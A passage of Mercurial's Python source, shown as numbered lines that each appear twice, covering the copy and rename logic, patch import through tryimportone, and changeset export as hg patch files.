911 # case only renames, like a => A.
911 # case only renames, like a => A.
912 abspath, absname = abstarget.rsplit('/', 1)
912 abspath, absname = abstarget.rsplit('/', 1)
913 abstarget = repo.dirstate.normalize(abspath) + '/' + absname
913 abstarget = repo.dirstate.normalize(abspath) + '/' + absname
914 reltarget = repo.pathto(abstarget, cwd)
914 reltarget = repo.pathto(abstarget, cwd)
915 target = repo.wjoin(abstarget)
915 target = repo.wjoin(abstarget)
916 src = repo.wjoin(abssrc)
916 src = repo.wjoin(abssrc)
917 state = repo.dirstate[abstarget]
917 state = repo.dirstate[abstarget]
918
918
919 scmutil.checkportable(ui, abstarget)
919 scmutil.checkportable(ui, abstarget)
920
920
921 # check for collisions
921 # check for collisions
922 prevsrc = targets.get(abstarget)
922 prevsrc = targets.get(abstarget)
923 if prevsrc is not None:
923 if prevsrc is not None:
924 ui.warn(_('%s: not overwriting - %s collides with %s\n') %
924 ui.warn(_('%s: not overwriting - %s collides with %s\n') %
925 (reltarget, repo.pathto(abssrc, cwd),
925 (reltarget, repo.pathto(abssrc, cwd),
926 repo.pathto(prevsrc, cwd)))
926 repo.pathto(prevsrc, cwd)))
927 return
927 return
928
928
929 # check for overwrites
929 # check for overwrites
930 exists = os.path.lexists(target)
930 exists = os.path.lexists(target)
931 samefile = False
931 samefile = False
932 if exists and abssrc != abstarget:
932 if exists and abssrc != abstarget:
933 if (repo.dirstate.normalize(abssrc) ==
933 if (repo.dirstate.normalize(abssrc) ==
934 repo.dirstate.normalize(abstarget)):
934 repo.dirstate.normalize(abstarget)):
935 if not rename:
935 if not rename:
936 ui.warn(_("%s: can't copy - same file\n") % reltarget)
936 ui.warn(_("%s: can't copy - same file\n") % reltarget)
937 return
937 return
938 exists = False
938 exists = False
939 samefile = True
939 samefile = True
940
940
941 if not after and exists or after and state in 'mn':
941 if not after and exists or after and state in 'mn':
942 if not opts['force']:
942 if not opts['force']:
943 if state in 'mn':
943 if state in 'mn':
944 msg = _('%s: not overwriting - file already committed\n')
944 msg = _('%s: not overwriting - file already committed\n')
945 if after:
945 if after:
946 flags = '--after --force'
946 flags = '--after --force'
947 else:
947 else:
948 flags = '--force'
948 flags = '--force'
949 if rename:
949 if rename:
950 hint = _('(hg rename %s to replace the file by '
950 hint = _('(hg rename %s to replace the file by '
951 'recording a rename)\n') % flags
951 'recording a rename)\n') % flags
952 else:
952 else:
953 hint = _('(hg copy %s to replace the file by '
953 hint = _('(hg copy %s to replace the file by '
954 'recording a copy)\n') % flags
954 'recording a copy)\n') % flags
955 else:
955 else:
956 msg = _('%s: not overwriting - file exists\n')
956 msg = _('%s: not overwriting - file exists\n')
957 if rename:
957 if rename:
958 hint = _('(hg rename --after to record the rename)\n')
958 hint = _('(hg rename --after to record the rename)\n')
959 else:
959 else:
960 hint = _('(hg copy --after to record the copy)\n')
960 hint = _('(hg copy --after to record the copy)\n')
961 ui.warn(msg % reltarget)
961 ui.warn(msg % reltarget)
962 ui.warn(hint)
962 ui.warn(hint)
963 return
963 return
964
964
965 if after:
965 if after:
966 if not exists:
966 if not exists:
967 if rename:
967 if rename:
968 ui.warn(_('%s: not recording move - %s does not exist\n') %
968 ui.warn(_('%s: not recording move - %s does not exist\n') %
969 (relsrc, reltarget))
969 (relsrc, reltarget))
970 else:
970 else:
971 ui.warn(_('%s: not recording copy - %s does not exist\n') %
971 ui.warn(_('%s: not recording copy - %s does not exist\n') %
972 (relsrc, reltarget))
972 (relsrc, reltarget))
973 return
973 return
974 elif not dryrun:
974 elif not dryrun:
975 try:
975 try:
976 if exists:
976 if exists:
977 os.unlink(target)
977 os.unlink(target)
978 targetdir = os.path.dirname(target) or '.'
978 targetdir = os.path.dirname(target) or '.'
979 if not os.path.isdir(targetdir):
979 if not os.path.isdir(targetdir):
980 os.makedirs(targetdir)
980 os.makedirs(targetdir)
981 if samefile:
981 if samefile:
982 tmp = target + "~hgrename"
982 tmp = target + "~hgrename"
983 os.rename(src, tmp)
983 os.rename(src, tmp)
984 os.rename(tmp, target)
984 os.rename(tmp, target)
985 else:
985 else:
986 util.copyfile(src, target)
986 util.copyfile(src, target)
987 srcexists = True
987 srcexists = True
988 except IOError as inst:
988 except IOError as inst:
989 if inst.errno == errno.ENOENT:
989 if inst.errno == errno.ENOENT:
990 ui.warn(_('%s: deleted in working directory\n') % relsrc)
990 ui.warn(_('%s: deleted in working directory\n') % relsrc)
991 srcexists = False
991 srcexists = False
992 else:
992 else:
993 ui.warn(_('%s: cannot copy - %s\n') %
993 ui.warn(_('%s: cannot copy - %s\n') %
994 (relsrc, inst.strerror))
994 (relsrc, inst.strerror))
995 return True # report a failure
995 return True # report a failure
996
996
997 if ui.verbose or not exact:
997 if ui.verbose or not exact:
998 if rename:
998 if rename:
999 ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
999 ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
1000 else:
1000 else:
1001 ui.status(_('copying %s to %s\n') % (relsrc, reltarget))
1001 ui.status(_('copying %s to %s\n') % (relsrc, reltarget))
1002
1002
1003 targets[abstarget] = abssrc
1003 targets[abstarget] = abssrc
1004
1004
1005 # fix up dirstate
1005 # fix up dirstate
1006 scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
1006 scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
1007 dryrun=dryrun, cwd=cwd)
1007 dryrun=dryrun, cwd=cwd)
1008 if rename and not dryrun:
1008 if rename and not dryrun:
1009 if not after and srcexists and not samefile:
1009 if not after and srcexists and not samefile:
1010 repo.wvfs.unlinkpath(abssrc)
1010 repo.wvfs.unlinkpath(abssrc)
1011 wctx.forget([abssrc])
1011 wctx.forget([abssrc])
1012
1012
1013 # pat: ossep
1013 # pat: ossep
1014 # dest ossep
1014 # dest ossep
1015 # srcs: list of (hgsep, hgsep, ossep, bool)
1015 # srcs: list of (hgsep, hgsep, ossep, bool)
1016 # return: function that takes hgsep and returns ossep
1016 # return: function that takes hgsep and returns ossep
1017 def targetpathfn(pat, dest, srcs):
1017 def targetpathfn(pat, dest, srcs):
1018 if os.path.isdir(pat):
1018 if os.path.isdir(pat):
1019 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1019 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1020 abspfx = util.localpath(abspfx)
1020 abspfx = util.localpath(abspfx)
1021 if destdirexists:
1021 if destdirexists:
1022 striplen = len(os.path.split(abspfx)[0])
1022 striplen = len(os.path.split(abspfx)[0])
1023 else:
1023 else:
1024 striplen = len(abspfx)
1024 striplen = len(abspfx)
1025 if striplen:
1025 if striplen:
1026 striplen += len(pycompat.ossep)
1026 striplen += len(pycompat.ossep)
1027 res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
1027 res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
1028 elif destdirexists:
1028 elif destdirexists:
1029 res = lambda p: os.path.join(dest,
1029 res = lambda p: os.path.join(dest,
1030 os.path.basename(util.localpath(p)))
1030 os.path.basename(util.localpath(p)))
1031 else:
1031 else:
1032 res = lambda p: dest
1032 res = lambda p: dest
1033 return res
1033 return res
1034
1034
1035 # pat: ossep
1035 # pat: ossep
1036 # dest ossep
1036 # dest ossep
1037 # srcs: list of (hgsep, hgsep, ossep, bool)
1037 # srcs: list of (hgsep, hgsep, ossep, bool)
1038 # return: function that takes hgsep and returns ossep
1038 # return: function that takes hgsep and returns ossep
1039 def targetpathafterfn(pat, dest, srcs):
1039 def targetpathafterfn(pat, dest, srcs):
1040 if matchmod.patkind(pat):
1040 if matchmod.patkind(pat):
1041 # a mercurial pattern
1041 # a mercurial pattern
1042 res = lambda p: os.path.join(dest,
1042 res = lambda p: os.path.join(dest,
1043 os.path.basename(util.localpath(p)))
1043 os.path.basename(util.localpath(p)))
1044 else:
1044 else:
1045 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1045 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1046 if len(abspfx) < len(srcs[0][0]):
1046 if len(abspfx) < len(srcs[0][0]):
1047 # A directory. Either the target path contains the last
1047 # A directory. Either the target path contains the last
1048 # component of the source path or it does not.
1048 # component of the source path or it does not.
1049 def evalpath(striplen):
1049 def evalpath(striplen):
1050 score = 0
1050 score = 0
1051 for s in srcs:
1051 for s in srcs:
1052 t = os.path.join(dest, util.localpath(s[0])[striplen:])
1052 t = os.path.join(dest, util.localpath(s[0])[striplen:])
1053 if os.path.lexists(t):
1053 if os.path.lexists(t):
1054 score += 1
1054 score += 1
1055 return score
1055 return score
1056
1056
1057 abspfx = util.localpath(abspfx)
1057 abspfx = util.localpath(abspfx)
1058 striplen = len(abspfx)
1058 striplen = len(abspfx)
1059 if striplen:
1059 if striplen:
1060 striplen += len(pycompat.ossep)
1060 striplen += len(pycompat.ossep)
1061 if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
1061 if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
1062 score = evalpath(striplen)
1062 score = evalpath(striplen)
1063 striplen1 = len(os.path.split(abspfx)[0])
1063 striplen1 = len(os.path.split(abspfx)[0])
1064 if striplen1:
1064 if striplen1:
1065 striplen1 += len(pycompat.ossep)
1065 striplen1 += len(pycompat.ossep)
1066 if evalpath(striplen1) > score:
1066 if evalpath(striplen1) > score:
1067 striplen = striplen1
1067 striplen = striplen1
1068 res = lambda p: os.path.join(dest,
1068 res = lambda p: os.path.join(dest,
1069 util.localpath(p)[striplen:])
1069 util.localpath(p)[striplen:])
1070 else:
1070 else:
1071 # a file
1071 # a file
1072 if destdirexists:
1072 if destdirexists:
1073 res = lambda p: os.path.join(dest,
1073 res = lambda p: os.path.join(dest,
1074 os.path.basename(util.localpath(p)))
1074 os.path.basename(util.localpath(p)))
1075 else:
1075 else:
1076 res = lambda p: dest
1076 res = lambda p: dest
1077 return res
1077 return res
1078
1078
1079 pats = scmutil.expandpats(pats)
1079 pats = scmutil.expandpats(pats)
1080 if not pats:
1080 if not pats:
1081 raise error.Abort(_('no source or destination specified'))
1081 raise error.Abort(_('no source or destination specified'))
1082 if len(pats) == 1:
1082 if len(pats) == 1:
1083 raise error.Abort(_('no destination specified'))
1083 raise error.Abort(_('no destination specified'))
1084 dest = pats.pop()
1084 dest = pats.pop()
1085 destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
1085 destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
1086 if not destdirexists:
1086 if not destdirexists:
1087 if len(pats) > 1 or matchmod.patkind(pats[0]):
1087 if len(pats) > 1 or matchmod.patkind(pats[0]):
1088 raise error.Abort(_('with multiple sources, destination must be an '
1088 raise error.Abort(_('with multiple sources, destination must be an '
1089 'existing directory'))
1089 'existing directory'))
1090 if util.endswithsep(dest):
1090 if util.endswithsep(dest):
1091 raise error.Abort(_('destination %s is not a directory') % dest)
1091 raise error.Abort(_('destination %s is not a directory') % dest)
1092
1092
1093 tfn = targetpathfn
1093 tfn = targetpathfn
1094 if after:
1094 if after:
1095 tfn = targetpathafterfn
1095 tfn = targetpathafterfn
1096 copylist = []
1096 copylist = []
1097 for pat in pats:
1097 for pat in pats:
1098 srcs = walkpat(pat)
1098 srcs = walkpat(pat)
1099 if not srcs:
1099 if not srcs:
1100 continue
1100 continue
1101 copylist.append((tfn(pat, dest, srcs), srcs))
1101 copylist.append((tfn(pat, dest, srcs), srcs))
1102 if not copylist:
1102 if not copylist:
1103 raise error.Abort(_('no files to copy'))
1103 raise error.Abort(_('no files to copy'))
1104
1104
1105 errors = 0
1105 errors = 0
1106 for targetpath, srcs in copylist:
1106 for targetpath, srcs in copylist:
1107 for abssrc, relsrc, exact in srcs:
1107 for abssrc, relsrc, exact in srcs:
1108 if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
1108 if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
1109 errors += 1
1109 errors += 1
1110
1110
1111 if errors:
1111 if errors:
1112 ui.warn(_('(consider using --after)\n'))
1112 ui.warn(_('(consider using --after)\n'))
1113
1113
1114 return errors != 0
1114 return errors != 0
1115
1115
1116 ## facility to let extension process additional data into an import patch
1116 ## facility to let extension process additional data into an import patch
1117 # list of identifier to be executed in order
1117 # list of identifier to be executed in order
1118 extrapreimport = [] # run before commit
1118 extrapreimport = [] # run before commit
1119 extrapostimport = [] # run after commit
1119 extrapostimport = [] # run after commit
1120 # mapping from identifier to actual import function
1120 # mapping from identifier to actual import function
1121 #
1121 #
1122 # 'preimport' are run before the commit is made and are provided the following
1122 # 'preimport' are run before the commit is made and are provided the following
1123 # arguments:
1123 # arguments:
1124 # - repo: the localrepository instance,
1124 # - repo: the localrepository instance,
1125 # - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
1125 # - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
1126 # - extra: the future extra dictionary of the changeset, please mutate it,
1126 # - extra: the future extra dictionary of the changeset, please mutate it,
1127 # - opts: the import options.
1127 # - opts: the import options.
1128 # XXX ideally, we would just pass an ctx ready to be computed, that would allow
1128 # XXX ideally, we would just pass an ctx ready to be computed, that would allow
1129 # mutation of in memory commit and more. Feel free to rework the code to get
1129 # mutation of in memory commit and more. Feel free to rework the code to get
1130 # there.
1130 # there.
1131 extrapreimportmap = {}
1131 extrapreimportmap = {}
1132 # 'postimport' are run after the commit is made and are provided the following
1132 # 'postimport' are run after the commit is made and are provided the following
1133 # argument:
1133 # argument:
1134 # - ctx: the changectx created by import.
1134 # - ctx: the changectx created by import.
1135 extrapostimportmap = {}
1135 extrapostimportmap = {}
1136
1136
1137 def tryimportone(ui, repo, hunk, parents, opts, msgs, updatefunc):
1137 def tryimportone(ui, repo, hunk, parents, opts, msgs, updatefunc):
1138 """Utility function used by commands.import to import a single patch
1138 """Utility function used by commands.import to import a single patch
1139
1139
1140 This function is explicitly defined here to help the evolve extension to
1140 This function is explicitly defined here to help the evolve extension to
1141 wrap this part of the import logic.
1141 wrap this part of the import logic.
1142
1142
1143 The API is currently a bit ugly because it a simple code translation from
1143 The API is currently a bit ugly because it a simple code translation from
1144 the import command. Feel free to make it better.
1144 the import command. Feel free to make it better.
1145
1145
1146 :hunk: a patch (as a binary string)
1146 :hunk: a patch (as a binary string)
1147 :parents: nodes that will be parent of the created commit
1147 :parents: nodes that will be parent of the created commit
1148 :opts: the full dict of option passed to the import command
1148 :opts: the full dict of option passed to the import command
1149 :msgs: list to save commit message to.
1149 :msgs: list to save commit message to.
1150 (used in case we need to save it when failing)
1150 (used in case we need to save it when failing)
1151 :updatefunc: a function that update a repo to a given node
1151 :updatefunc: a function that update a repo to a given node
1152 updatefunc(<repo>, <node>)
1152 updatefunc(<repo>, <node>)
1153 """
1153 """
1154 # avoid cycle context -> subrepo -> cmdutil
1154 # avoid cycle context -> subrepo -> cmdutil
1155 from . import context
1155 from . import context
1156 extractdata = patch.extract(ui, hunk)
1156 extractdata = patch.extract(ui, hunk)
1157 tmpname = extractdata.get('filename')
1157 tmpname = extractdata.get('filename')
1158 message = extractdata.get('message')
1158 message = extractdata.get('message')
1159 user = opts.get('user') or extractdata.get('user')
1159 user = opts.get('user') or extractdata.get('user')
1160 date = opts.get('date') or extractdata.get('date')
1160 date = opts.get('date') or extractdata.get('date')
1161 branch = extractdata.get('branch')
1161 branch = extractdata.get('branch')
1162 nodeid = extractdata.get('nodeid')
1162 nodeid = extractdata.get('nodeid')
1163 p1 = extractdata.get('p1')
1163 p1 = extractdata.get('p1')
1164 p2 = extractdata.get('p2')
1164 p2 = extractdata.get('p2')
1165
1165
1166 nocommit = opts.get('no_commit')
1166 nocommit = opts.get('no_commit')
1167 importbranch = opts.get('import_branch')
1167 importbranch = opts.get('import_branch')
1168 update = not opts.get('bypass')
1168 update = not opts.get('bypass')
1169 strip = opts["strip"]
1169 strip = opts["strip"]
1170 prefix = opts["prefix"]
1170 prefix = opts["prefix"]
1171 sim = float(opts.get('similarity') or 0)
1171 sim = float(opts.get('similarity') or 0)
1172 if not tmpname:
1172 if not tmpname:
1173 return (None, None, False)
1173 return (None, None, False)
1174
1174
1175 rejects = False
1175 rejects = False
1176
1176
1177 try:
1177 try:
1178 cmdline_message = logmessage(ui, opts)
1178 cmdline_message = logmessage(ui, opts)
1179 if cmdline_message:
1179 if cmdline_message:
1180 # pickup the cmdline msg
1180 # pickup the cmdline msg
1181 message = cmdline_message
1181 message = cmdline_message
1182 elif message:
1182 elif message:
1183 # pickup the patch msg
1183 # pickup the patch msg
1184 message = message.strip()
1184 message = message.strip()
1185 else:
1185 else:
1186 # launch the editor
1186 # launch the editor
1187 message = None
1187 message = None
1188 ui.debug('message:\n%s\n' % message)
1188 ui.debug('message:\n%s\n' % message)
1189
1189
1190 if len(parents) == 1:
1190 if len(parents) == 1:
1191 parents.append(repo[nullid])
1191 parents.append(repo[nullid])
1192 if opts.get('exact'):
1192 if opts.get('exact'):
1193 if not nodeid or not p1:
1193 if not nodeid or not p1:
1194 raise error.Abort(_('not a Mercurial patch'))
1194 raise error.Abort(_('not a Mercurial patch'))
1195 p1 = repo[p1]
1195 p1 = repo[p1]
1196 p2 = repo[p2 or nullid]
1196 p2 = repo[p2 or nullid]
1197 elif p2:
1197 elif p2:
1198 try:
1198 try:
1199 p1 = repo[p1]
1199 p1 = repo[p1]
1200 p2 = repo[p2]
1200 p2 = repo[p2]
1201 # Without any options, consider p2 only if the
1201 # Without any options, consider p2 only if the
1202 # patch is being applied on top of the recorded
1202 # patch is being applied on top of the recorded
1203 # first parent.
1203 # first parent.
1204 if p1 != parents[0]:
1204 if p1 != parents[0]:
1205 p1 = parents[0]
1205 p1 = parents[0]
1206 p2 = repo[nullid]
1206 p2 = repo[nullid]
1207 except error.RepoError:
1207 except error.RepoError:
1208 p1, p2 = parents
1208 p1, p2 = parents
1209 if p2.node() == nullid:
1209 if p2.node() == nullid:
1210 ui.warn(_("warning: import the patch as a normal revision\n"
1210 ui.warn(_("warning: import the patch as a normal revision\n"
1211 "(use --exact to import the patch as a merge)\n"))
1211 "(use --exact to import the patch as a merge)\n"))
1212 else:
1212 else:
1213 p1, p2 = parents
1213 p1, p2 = parents
1214
1214
1215 n = None
1215 n = None
1216 if update:
1216 if update:
1217 if p1 != parents[0]:
1217 if p1 != parents[0]:
1218 updatefunc(repo, p1.node())
1218 updatefunc(repo, p1.node())
1219 if p2 != parents[1]:
1219 if p2 != parents[1]:
1220 repo.setparents(p1.node(), p2.node())
1220 repo.setparents(p1.node(), p2.node())
1221
1221
1222 if opts.get('exact') or importbranch:
1222 if opts.get('exact') or importbranch:
1223 repo.dirstate.setbranch(branch or 'default')
1223 repo.dirstate.setbranch(branch or 'default')
1224
1224
1225 partial = opts.get('partial', False)
1225 partial = opts.get('partial', False)
1226 files = set()
1226 files = set()
1227 try:
1227 try:
1228 patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
1228 patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
1229 files=files, eolmode=None, similarity=sim / 100.0)
1229 files=files, eolmode=None, similarity=sim / 100.0)
1230 except patch.PatchError as e:
1230 except patch.PatchError as e:
1231 if not partial:
1231 if not partial:
1232 raise error.Abort(str(e))
1232 raise error.Abort(str(e))
1233 if partial:
1233 if partial:
1234 rejects = True
1234 rejects = True
1235
1235
1236 files = list(files)
1236 files = list(files)
1237 if nocommit:
1237 if nocommit:
1238 if message:
1238 if message:
1239 msgs.append(message)
1239 msgs.append(message)
1240 else:
1240 else:
1241 if opts.get('exact') or p2:
1241 if opts.get('exact') or p2:
1242 # If you got here, you either use --force and know what
1242 # If you got here, you either use --force and know what
1243 # you are doing or used --exact or a merge patch while
1243 # you are doing or used --exact or a merge patch while
1244 # being updated to its first parent.
1244 # being updated to its first parent.
1245 m = None
1245 m = None
1246 else:
1246 else:
1247 m = scmutil.matchfiles(repo, files or [])
1247 m = scmutil.matchfiles(repo, files or [])
1248 editform = mergeeditform(repo[None], 'import.normal')
1248 editform = mergeeditform(repo[None], 'import.normal')
1249 if opts.get('exact'):
1249 if opts.get('exact'):
1250 editor = None
1250 editor = None
1251 else:
1251 else:
1252 editor = getcommiteditor(editform=editform, **opts)
1252 editor = getcommiteditor(editform=editform, **opts)
1253 extra = {}
1253 extra = {}
1254 for idfunc in extrapreimport:
1254 for idfunc in extrapreimport:
1255 extrapreimportmap[idfunc](repo, extractdata, extra, opts)
1255 extrapreimportmap[idfunc](repo, extractdata, extra, opts)
1256 overrides = {}
1256 overrides = {}
1257 if partial:
1257 if partial:
1258 overrides[('ui', 'allowemptycommit')] = True
1258 overrides[('ui', 'allowemptycommit')] = True
1259 with repo.ui.configoverride(overrides, 'import'):
1259 with repo.ui.configoverride(overrides, 'import'):
1260 n = repo.commit(message, user,
1260 n = repo.commit(message, user,
1261 date, match=m,
1261 date, match=m,
1262 editor=editor, extra=extra)
1262 editor=editor, extra=extra)
1263 for idfunc in extrapostimport:
1263 for idfunc in extrapostimport:
1264 extrapostimportmap[idfunc](repo[n])
1264 extrapostimportmap[idfunc](repo[n])
1265 else:
1265 else:
1266 if opts.get('exact') or importbranch:
1266 if opts.get('exact') or importbranch:
1267 branch = branch or 'default'
1267 branch = branch or 'default'
1268 else:
1268 else:
1269 branch = p1.branch()
1269 branch = p1.branch()
1270 store = patch.filestore()
1270 store = patch.filestore()
1271 try:
1271 try:
1272 files = set()
1272 files = set()
1273 try:
1273 try:
1274 patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
1274 patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
1275 files, eolmode=None)
1275 files, eolmode=None)
1276 except patch.PatchError as e:
1276 except patch.PatchError as e:
1277 raise error.Abort(str(e))
1277 raise error.Abort(str(e))
1278 if opts.get('exact'):
1278 if opts.get('exact'):
1279 editor = None
1279 editor = None
1280 else:
1280 else:
1281 editor = getcommiteditor(editform='import.bypass')
1281 editor = getcommiteditor(editform='import.bypass')
1282 memctx = context.memctx(repo, (p1.node(), p2.node()),
1282 memctx = context.memctx(repo, (p1.node(), p2.node()),
1283 message,
1283 message,
1284 files=files,
1284 files=files,
1285 filectxfn=store,
1285 filectxfn=store,
1286 user=user,
1286 user=user,
1287 date=date,
1287 date=date,
1288 branch=branch,
1288 branch=branch,
1289 editor=editor)
1289 editor=editor)
1290 n = memctx.commit()
1290 n = memctx.commit()
1291 finally:
1291 finally:
1292 store.close()
1292 store.close()
1293 if opts.get('exact') and nocommit:
1293 if opts.get('exact') and nocommit:
1294 # --exact with --no-commit is still useful in that it does merge
1294 # --exact with --no-commit is still useful in that it does merge
1295 # and branch bits
1295 # and branch bits
1296 ui.warn(_("warning: can't check exact import with --no-commit\n"))
1296 ui.warn(_("warning: can't check exact import with --no-commit\n"))
1297 elif opts.get('exact') and hex(n) != nodeid:
1297 elif opts.get('exact') and hex(n) != nodeid:
1298 raise error.Abort(_('patch is damaged or loses information'))
1298 raise error.Abort(_('patch is damaged or loses information'))
1299 msg = _('applied to working directory')
1299 msg = _('applied to working directory')
1300 if n:
1300 if n:
1301 # i18n: refers to a short changeset id
1301 # i18n: refers to a short changeset id
1302 msg = _('created %s') % short(n)
1302 msg = _('created %s') % short(n)
1303 return (msg, n, rejects)
1303 return (msg, n, rejects)
1304 finally:
1304 finally:
1305 os.unlink(tmpname)
1305 os.unlink(tmpname)
1306
1306
1307 # facility to let extensions include additional data in an exported patch
1307 # facility to let extensions include additional data in an exported patch
1308 # list of identifiers to be executed in order
1308 # list of identifiers to be executed in order
1309 extraexport = []
1309 extraexport = []
1310 # mapping from identifier to actual export function
1310 # mapping from identifier to actual export function
1311 # function as to return a string to be added to the header or None
1311 # function as to return a string to be added to the header or None
1312 # it is given two arguments (sequencenumber, changectx)
1312 # it is given two arguments (sequencenumber, changectx)
1313 extraexportmap = {}
1313 extraexportmap = {}
1314
1314
1315 def _exportsingle(repo, ctx, match, switch_parent, rev, seqno, write, diffopts):
1315 def _exportsingle(repo, ctx, match, switch_parent, rev, seqno, write, diffopts):
1316 node = scmutil.binnode(ctx)
1316 node = scmutil.binnode(ctx)
1317 parents = [p.node() for p in ctx.parents() if p]
1317 parents = [p.node() for p in ctx.parents() if p]
1318 branch = ctx.branch()
1318 branch = ctx.branch()
1319 if switch_parent:
1319 if switch_parent:
1320 parents.reverse()
1320 parents.reverse()
1321
1321
1322 if parents:
1322 if parents:
1323 prev = parents[0]
1323 prev = parents[0]
1324 else:
1324 else:
1325 prev = nullid
1325 prev = nullid
1326
1326
1327 write("# HG changeset patch\n")
1327 write("# HG changeset patch\n")
1328 write("# User %s\n" % ctx.user())
1328 write("# User %s\n" % ctx.user())
1329 write("# Date %d %d\n" % ctx.date())
1329 write("# Date %d %d\n" % ctx.date())
1330 write("# %s\n" % util.datestr(ctx.date()))
1330 write("# %s\n" % util.datestr(ctx.date()))
1331 if branch and branch != 'default':
1331 if branch and branch != 'default':
1332 write("# Branch %s\n" % branch)
1332 write("# Branch %s\n" % branch)
1333 write("# Node ID %s\n" % hex(node))
1333 write("# Node ID %s\n" % hex(node))
1334 write("# Parent %s\n" % hex(prev))
1334 write("# Parent %s\n" % hex(prev))
1335 if len(parents) > 1:
1335 if len(parents) > 1:
1336 write("# Parent %s\n" % hex(parents[1]))
1336 write("# Parent %s\n" % hex(parents[1]))
1337
1337
1338 for headerid in extraexport:
1338 for headerid in extraexport:
1339 header = extraexportmap[headerid](seqno, ctx)
1339 header = extraexportmap[headerid](seqno, ctx)
1340 if header is not None:
1340 if header is not None:
1341 write('# %s\n' % header)
1341 write('# %s\n' % header)
1342 write(ctx.description().rstrip())
1342 write(ctx.description().rstrip())
1343 write("\n\n")
1343 write("\n\n")
1344
1344
1345 for chunk, label in patch.diffui(repo, prev, node, match, opts=diffopts):
1345 for chunk, label in patch.diffui(repo, prev, node, match, opts=diffopts):
1346 write(chunk, label=label)
1346 write(chunk, label=label)
1347
1347
1348 def export(repo, revs, fntemplate='hg-%h.patch', fp=None, switch_parent=False,
1348 def export(repo, revs, fntemplate='hg-%h.patch', fp=None, switch_parent=False,
1349 opts=None, match=None):
1349 opts=None, match=None):
1350 '''export changesets as hg patches
1350 '''export changesets as hg patches
1351
1351
1352 Args:
1352 Args:
1353 repo: The repository from which we're exporting revisions.
1353 repo: The repository from which we're exporting revisions.
1354 revs: A list of revisions to export as revision numbers.
1354 revs: A list of revisions to export as revision numbers.
1355 fntemplate: An optional string to use for generating patch file names.
1355 fntemplate: An optional string to use for generating patch file names.
1356 fp: An optional file-like object to which patches should be written.
1356 fp: An optional file-like object to which patches should be written.
1357 switch_parent: If True, show diffs against second parent when not nullid.
1357 switch_parent: If True, show diffs against second parent when not nullid.
1358 Default is false, which always shows diff against p1.
1358 Default is false, which always shows diff against p1.
1359 opts: diff options to use for generating the patch.
1359 opts: diff options to use for generating the patch.
1360 match: If specified, only export changes to files matching this matcher.
1360 match: If specified, only export changes to files matching this matcher.
1361
1361
1362 Returns:
1362 Returns:
1363 Nothing.
1363 Nothing.
1364
1364
1365 Side Effect:
1365 Side Effect:
1366 "HG Changeset Patch" data is emitted to one of the following
1366 "HG Changeset Patch" data is emitted to one of the following
1367 destinations:
1367 destinations:
1368 fp is specified: All revs are written to the specified
1368 fp is specified: All revs are written to the specified
1369 file-like object.
1369 file-like object.
1370 fntemplate specified: Each rev is written to a unique file named using
1370 fntemplate specified: Each rev is written to a unique file named using
1371 the given template.
1371 the given template.
1372 Neither fp nor template specified: All revs written to repo.ui.write()
1372 Neither fp nor template specified: All revs written to repo.ui.write()
1373 '''
1373 '''
1374
1374
1375 total = len(revs)
1375 total = len(revs)
1376 revwidth = max(len(str(rev)) for rev in revs)
1376 revwidth = max(len(str(rev)) for rev in revs)
1377 filemode = {}
1377 filemode = {}
1378
1378
1379 write = None
1379 write = None
1380 dest = '<unnamed>'
1380 dest = '<unnamed>'
1381 if fp:
1381 if fp:
1382 dest = getattr(fp, 'name', dest)
1382 dest = getattr(fp, 'name', dest)
1383 def write(s, **kw):
1383 def write(s, **kw):
1384 fp.write(s)
1384 fp.write(s)
1385 elif not fntemplate:
1385 elif not fntemplate:
1386 write = repo.ui.write
1386 write = repo.ui.write
1387
1387
1388 for seqno, rev in enumerate(revs, 1):
1388 for seqno, rev in enumerate(revs, 1):
1389 ctx = repo[rev]
1389 ctx = repo[rev]
1390 fo = None
1390 fo = None
1391 if not fp and fntemplate:
1391 if not fp and fntemplate:
1392 desc_lines = ctx.description().rstrip().split('\n')
1392 desc_lines = ctx.description().rstrip().split('\n')
1393 desc = desc_lines[0] #Commit always has a first line.
1393 desc = desc_lines[0] #Commit always has a first line.
1394 fo = makefileobj(repo, fntemplate, ctx.node(), desc=desc,
1394 fo = makefileobj(repo, fntemplate, ctx.node(), desc=desc,
1395 total=total, seqno=seqno, revwidth=revwidth,
1395 total=total, seqno=seqno, revwidth=revwidth,
1396 mode='wb', modemap=filemode)
1396 mode='wb', modemap=filemode)
1397 dest = fo.name
1397 dest = fo.name
1398 def write(s, **kw):
1398 def write(s, **kw):
1399 fo.write(s)
1399 fo.write(s)
1400 if not dest.startswith('<'):
1400 if not dest.startswith('<'):
1401 repo.ui.note("%s\n" % dest)
1401 repo.ui.note("%s\n" % dest)
1402 _exportsingle(
1402 _exportsingle(
1403 repo, ctx, match, switch_parent, rev, seqno, write, opts)
1403 repo, ctx, match, switch_parent, rev, seqno, write, opts)
1404 if fo is not None:
1404 if fo is not None:
1405 fo.close()
1405 fo.close()
1406
1406
1407 def diffordiffstat(ui, repo, diffopts, node1, node2, match,
1407 def diffordiffstat(ui, repo, diffopts, node1, node2, match,
1408 changes=None, stat=False, fp=None, prefix='',
1408 changes=None, stat=False, fp=None, prefix='',
1409 root='', listsubrepos=False):
1409 root='', listsubrepos=False):
1410 '''show diff or diffstat.'''
1410 '''show diff or diffstat.'''
1411 if fp is None:
